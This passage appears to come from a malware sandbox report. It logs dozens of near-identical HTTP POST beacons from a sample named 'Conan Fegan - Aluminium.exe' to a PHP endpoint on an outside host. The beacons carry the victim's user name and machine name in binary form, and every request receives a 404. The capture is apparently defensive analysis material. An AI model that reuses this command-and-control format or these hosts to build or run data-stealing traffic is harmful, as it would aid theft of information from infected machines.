                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:19.073930979 CET1551OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:19.442205906 CET1551INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          13192.168.2.449760203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:20.041934967 CET1566OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:20.379368067 CET1574OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:20.749983072 CET1575INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          14192.168.2.449763203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:21.333542109 CET1576OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:21.678217888 CET1576OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:22.060681105 CET1576INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          15192.168.2.449764203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:22.669300079 CET1577OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:23.005808115 CET1577OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:23.380831003 CET1578INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          16192.168.2.449765203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:24.013552904 CET1578OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:24.359314919 CET1579OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:24.744710922 CET1579INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          17192.168.2.449766203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:25.353621006 CET1580OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:25.689847946 CET1580OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:26.056929111 CET1581INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          18192.168.2.449767203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:26.968743086 CET1581OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:27.304826021 CET1582OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:27.672360897 CET1582INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          19192.168.2.449768203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:28.278127909 CET1583OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:28.616413116 CET1583OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:28.982165098 CET1584INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.449749203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:04.676480055 CET1448OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:05.014952898 CET1448OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:05.396814108 CET1448INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          20192.168.2.449769203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:29.579658985 CET1584OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:29.916177034 CET1585OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:30.280127048 CET1585INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          21192.168.2.449770203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:30.894737959 CET1586OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:31.232486963 CET1586OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:31.604202986 CET1586INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          22192.168.2.449771203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:32.184418917 CET1587OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:32.523749113 CET1588OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:32.894319057 CET1588INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          23192.168.2.449772203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:33.518151999 CET1589OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:33.856682062 CET1589OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:34.233598948 CET1589INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:34 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          24192.168.2.449773203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:34.813981056 CET1590OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:35.148798943 CET1591OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:35.516104937 CET1591INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          25192.168.2.449774203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:36.095386982 CET1592OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:36.434465885 CET1593OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:36.808944941 CET1653INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          26192.168.2.449777203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:37.374891996 CET1681OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:37.711201906 CET1739OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:38.080215931 CET1774INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          27192.168.2.449781203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:38.688700914 CET1837OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:39.023402929 CET1848OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:39.392492056 CET1912INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          28192.168.2.449784203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:39.984081984 CET2001OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:40.320997953 CET2029OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:40.691271067 CET2188INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          29192.168.2.449788203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:41.300879002 CET2227OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:41.637780905 CET2410OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:42.004107952 CET2418INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.449750203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:06.053559065 CET1449OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:06.392352104 CET1538OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:06.769673109 CET1538INHTTP/1.1 404 Not Found
                                          Server: nginx
